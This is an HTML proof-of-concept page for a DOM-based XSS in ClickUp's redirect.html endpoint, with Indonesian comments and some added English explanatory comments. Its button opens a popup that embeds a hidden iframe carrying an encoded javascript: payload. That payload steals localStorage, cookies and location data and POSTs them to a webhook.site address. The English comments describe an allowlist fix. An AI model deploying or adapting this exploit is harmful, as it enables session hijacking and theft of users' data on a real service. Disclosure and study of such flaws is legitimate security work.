<!DOCTYPE html>
<html>
<head><title>ClickUp DOM XSS PoC</title></head>
<body>
<!--
  Proof-of-concept page. The button builds a second HTML document as a string,
  opens it in a blank popup, and that document embeds a hidden iframe whose src
  is a redirect endpoint with a javascript: URL in its "go" query parameter.
  The weakness it demonstrates is a redirect that passes an attacker-controlled
  URL scheme on to navigation. The payload's own comment claims it bypasses
  protocol/domain filters; whether that is true cannot be verified from this
  file. The defensive fix on the receiving side is to parse the target with the
  URL API and accept only http(s) URLs whose origin is on an explicit allowlist
  before assigning to location (a scheme/substring denylist is not sufficient).
  The page title also mentions postMessage(), but the code below only uses the
  query parameter.
-->
<h1>ClickUp DOM XSS via redirect.html + postMessage()</h1>
<p>Klik tombol → XSS jalan → steal localStorage + cookies</p>
<button onclick="exploit()">TRIGGER XSS</button>
<script>
// Button handler. Everything between the backticks of `payload` (including the
// comments inside it) is string content written into the popup document, not
// code of this script, so it is reproduced verbatim.
function exploit() {
const payload = `
<script>
// Bypass semua filter dangerousProtocols & allowedDomains
const evil = "javascript:eval(atob('${btoa(`
// STEAL SEMUA DATA
const data = {
localStorage: JSON.stringify(localStorage),
cookies: document.cookie,
url: location.href,
origin: location.origin
};
// Kirim ke attacker
fetch('https://webhook.site/2c1d7ce8-a03c-4f27-9b1c-8919a32bd492/clickup-pwn', {
method: 'POST',
body: JSON.stringify(data),
headers: {'Content-Type': 'application/json'}
});
// Alert biar keliatan
alert('PWNED! Check webhook.site');
`)}'))";
// Bikin iframe invisible
const iframe = document.createElement('iframe');
iframe.src = 'https://zendesk.clickup.com/redirect.html?go=' + encodeURIComponent(evil);
iframe.style.display = 'none';
document.body.appendChild(iframe);
<\/script>
`;
// Open a blank popup and write the generated document into it
const win = window.open('', '_blank', 'width=600,height=400');
win.document.write(payload);
}
</script>
</body>
</html>